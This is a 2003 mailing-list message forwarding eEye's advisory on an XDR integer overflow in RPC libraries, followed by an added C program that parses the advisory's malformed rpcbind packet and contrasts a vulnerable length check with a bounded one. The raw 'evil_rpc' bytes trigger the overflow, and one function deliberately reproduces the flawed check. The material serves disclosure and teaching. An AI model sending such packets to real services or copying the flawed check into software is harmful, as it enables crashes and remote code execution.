Date: Wed, 19 Mar 2003 15:54:49 -0500
From: Mike Tancsa <mike@sentex.net>
To: security@freebsd.org
Subject: Fwd: EEYE: XDR Integer Overflow
Message-ID: <5.2.0.9.0.20030319155420.080cbab8@marble.sentex.ca>
Anyone know if this affects FreeBSD ? There is no mention in the CERT advisory.

---Mike

>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>From: "Marc Maiffret" <marc@eeye.com>
>To: "BUGTRAQ" <BUGTRAQ@securityfocus.com>
>Subject: EEYE: XDR Integer Overflow
>Date: Wed, 19 Mar 2003 12:20:14 -0800
>X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
>Importance: Normal
>X-Spam-Status: No, hits=0.6 required=7.0
>  tests=DISCLAIMER,KNOWN_MAILING_LIST,SPAM_PHRASE_01_02,
>  TO_LOCALPART_EQ_REAL,USER_AGENT_OUTLOOK
>  version=2.43
>X-Virus-Scanned: by Sentex Communications (avscan1/20021227)
>
>XDR Integer Overflow
>
>Release Date:
>March 19, 2003
>
>Severity:
>High (Remote Code Execution/Denial of Service)
>
>Systems Affected:
>
>Sun Microsystems Network Services Library (libnsl)
>BSD-derived libraries with XDR/RPC routines (libc)
>GNU C library with sunrpc (glibc)
>
>Description:
>
>XDR is a standard for the description and encoding of data which is used
>heavily in RPC implementations. Several libraries exist that allow a
>developer to incorporate XDR into his or her applications. Vulnerabilities
>were discovered in these libraries during the testing of new Retina auditing
>technologies developed by the eEye research department.
>
>ADAM and EVE are two technologies developed by eEye to remotely and locally
>audit applications for the existence of common vulnerabilities. During an
>ADAM audit, an integer overflow was discovered in the SUN Microsystems XDR
>library. By supplying specific integer values in length fields during an RPC
>transaction, we were able to produce various overflow conditions in UNIX RPC
>services.
>
>Technical Description:
>
>The xdrmem_getbytes() function in the XDR library provided by Sun
>Microsystems contains an integer overflow. Depending on the location and use
>of the vulnerable xdrmem_getbytes() routine, various conditions may be
>presented that can permit an attacker to remotely exploit a service using
>this vulnerable routine.
>
>For the purpose of signature development and further security research a
>sample session is included below that replicates an integer overflow in the
>rpcbind shipped with various versions of the Solaris operating system.
>
>char evil_rpc[] =
>
>"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86"
>"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
>"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C"
>"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86"
>"\xa0\x00\x00\x00\x02\x00\x00\x00\x04"
>"\xFF\xFF\xFF\xFF" // RPC argument length
>"EEYECLIPSE2003";
>
>Vendor Status:
>
>Sun Microsystems was contacted on November 13, 2002 and CERT was contacted
>shortly afterwards. Vendors believed to be vulnerable were contacted by CERT
>during a grace period of several months. Due to some difficulties
>communicating with vendors, after rescheduling several times a release date
>was set for March 18, 2003.
>
>eEye recommends obtaining the necessary patches or updates from vendors as
>they become available after the release of this and the CERT advisory.
>
>For a list of vendors and their responses, please review the CERT advisory
>at: http://www.cert.org/advisories/CA-2003-10.html
>
>You can find the latest copy of this advisory, along with other eEye
>research at http://www.eeye.com/.
>
>Credit:
>Riley Hassell - Senior Research Associate
>
>Greetings:
>Liver destroyers of the world:
>Barnes (DOW!), FX, and last but definitely not least, Heather and Jenn.
>
>Copyright (c) 1998-2003 eEye Digital Security
>Permission is hereby granted for the redistribution of this alert
>electronically. It is not to be edited in any way without express consent of
>eEye. If you wish to reprint the whole or any part of this alert in any
>other medium excluding electronic medium, please e-mail alert@eEye.com for
>permission.
>
>Disclaimer
>The information within this paper may change without notice. Use of this
>information constitutes acceptance for use in an AS IS condition. There are
>NO warranties with regard to this information. In no event shall the author
>be liable for any damages whatsoever arising out of or in connection with
>the use or spread of this information. Any use of this information is at the
>user's own risk.
>
>Feedback
>Please send suggestions, updates, and comments to:
>
>eEye Digital Security
>http://www.eEye.com
>info@eEye.com

--------------------------------------------------------------------
Mike Tancsa,                                          tel +1 519 651 3400
Sentex Communications,                                mike@sentex.net
Providing Internet since 1994                        www.sentex.net
Cambridge, Ontario Canada                            www.sentex.net/mike
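The program below is an added example written for this page; it is not code from the advisory, from eEye, or from any of the libc/libnsl/glibc implementations named above. The packet bytes are the advisory's own evil_rpc. Everything else is an assumption: the struct xdrmem layout (read cursor plus a signed "bytes remaining" counter), and the vulnerable "decrement, then test for negative" idiom, which models the general shape of a length-check integer overflow in an xdrmem_getbytes()-style routine, since the advisory names the function but does not quote its source. The code walks the RPC CALL header and the CALLIT arguments to the opaque argument length, then shows that with 14 bytes left in the buffer the signed-decrement check accepts a claimed length of 0xFFFFFFFF (14 - 0xFFFFFFFF wraps to 15 in unsigned arithmetic) while a compare-before-subtract check rejects it. Assumes a 32-bit int; build with cc -std=c99.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The rpcbind CALLIT request from the eEye advisory: the opaque argument
 * claims 0xFFFFFFFF bytes but only 14 ("EEYECLIPSE2003") follow it. */
static const unsigned char evil_rpc[] =
    "\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86"
    "\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
    "\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C"
    "\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86"
    "\xa0\x00\x00\x00\x02\x00\x00\x00\x04"
    "\xFF\xFF\xFF\xFF"
    "EEYECLIPSE2003";
#define EVIL_RPC_LEN (sizeof(evil_rpc) - 1) /* 102 bytes; drop the string NUL */
#define ARG_LEN_OFFSET 84                   /* offset of the 0xFFFFFFFF field */

/* Minimal in-memory XDR stream (assumed layout, in the xdrmem_* style):
 * x_private is the read cursor, x_handy the bytes left, kept in a signed
 * int because that is what lets the classic check wrap. Assumes 32-bit int. */
struct xdrmem {
    const unsigned char *x_private;
    int x_handy;
};

/* Vulnerable accounting (reconstruction, not the advisory's code): the
 * remaining count is decremented first and only then tested for negative.
 * int - uint32_t is evaluated as unsigned, so any len > x_handy + 2^31
 * wraps back to a small non-negative value and the caller would go on to
 * memcpy(dst, cursor, len). This function only reports the decision. */
bool vulnerable_getbytes_accepts(const struct xdrmem *x, uint32_t len) {
    int handy = x->x_handy;
    handy = (int)(handy - len);   /* 14 - 0xFFFFFFFF == 15 here */
    return handy >= 0;
}

/* Hardened form: compare before subtracting, in the unsigned domain, so no
 * value of len can slip past the remaining byte count. */
bool safe_getbytes(struct xdrmem *x, unsigned char *dst, uint32_t len) {
    if (x->x_handy < 0 || len > (uint32_t)x->x_handy) return false;
    memcpy(dst, x->x_private, len);
    x->x_private += len;
    x->x_handy -= (int)len;
    return true;
}

static bool get_u32(struct xdrmem *x, uint32_t *out) {
    unsigned char b[4];
    if (!safe_getbytes(x, b, 4)) return false;
    *out = ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) |
           ((uint32_t)b[2] << 8)  |  (uint32_t)b[3];
    return true;
}

/* Skip an opaque_auth {flavor, body<400>} (RFC 1057); body is padded to 4. */
static bool skip_opaque_auth(struct xdrmem *x) {
    uint32_t flavor, len;
    if (!get_u32(x, &flavor) || !get_u32(x, &len) || len > 400) return false;
    uint32_t padded = (len + 3u) & ~3u;
    if (padded > (uint32_t)x->x_handy) return false;
    x->x_private += padded;
    x->x_handy -= (int)padded;
    return true;
}

/* Walk a CALL header (xid, type, rpcvers, prog, vers, proc, cred, verf) and
 * the CALLIT arguments (prog, vers, proc) up to the opaque argument length,
 * leaving the stream positioned on the argument bytes. */
bool locate_callit_arg_len(struct xdrmem *x, uint32_t *arg_len) {
    uint32_t hdr[6], prog, vers, proc;
    for (int i = 0; i < 6; i++)
        if (!get_u32(x, &hdr[i])) return false;
    /* msg_type CALL(0), RPC version 2, PMAPPROG 100000, PMAPPROC_CALLIT 5 */
    if (hdr[1] != 0 || hdr[2] != 2 || hdr[3] != 100000 || hdr[5] != 5) return false;
    if (!skip_opaque_auth(x) || !skip_opaque_auth(x)) return false;
    if (!get_u32(x, &prog) || !get_u32(x, &vers) || !get_u32(x, &proc)) return false;
    return get_u32(x, arg_len);
}

struct verdict {
    bool parsed;              /* header walked to the argument length */
    uint32_t claimed_len;     /* length field as sent */
    int remaining;            /* bytes actually left in the packet */
    bool vulnerable_accepts;  /* classic check would proceed to memcpy */
    bool safe_accepts;        /* bounded check proceeds */
};

struct verdict analyse(const unsigned char *pkt, size_t n) {
    struct verdict v = {0};
    struct xdrmem x = { pkt, (int)n };
    unsigned char sink[128];
    if (!locate_callit_arg_len(&x, &v.claimed_len)) return v;
    v.parsed = true;
    v.remaining = x.x_handy;
    v.vulnerable_accepts = vulnerable_getbytes_accepts(&x, v.claimed_len);
    v.safe_accepts = v.claimed_len <= sizeof sink &&
                     safe_getbytes(&x, sink, v.claimed_len);
    return v;
}

/* Constructed control: the same packet with the length field set to 12,
 * i.e. a well-formed request, for comparison. */
void make_benign_copy(unsigned char *dst) {
    memcpy(dst, evil_rpc, EVIL_RPC_LEN);
    dst[ARG_LEN_OFFSET] = 0; dst[ARG_LEN_OFFSET + 1] = 0;
    dst[ARG_LEN_OFFSET + 2] = 0; dst[ARG_LEN_OFFSET + 3] = 12;
}

int main(void) {
    unsigned char benign[EVIL_RPC_LEN];
    make_benign_copy(benign);
    const unsigned char *pkts[2] = { evil_rpc, benign };
    for (int i = 0; i < 2; i++) {
        struct verdict v = analyse(pkts[i], EVIL_RPC_LEN);
        printf("claimed=%u remaining=%d classic_check=%s bounded_check=%s\n",
               v.claimed_len, v.remaining,
               v.vulnerable_accepts ? "accept" : "reject",
               v.safe_accepts ? "accept" : "reject");
    }
    return 0;
}
```

The evil packet is accepted by the classic check and rejected by the bounded one; the benign copy passes both. Note that the vulnerable routine is deliberately written to report rather than copy: on a real xdrmem stream the accepted 0xFFFFFFFF would drive memcpy() off the end of the receive buffer, which is the condition the advisory describes.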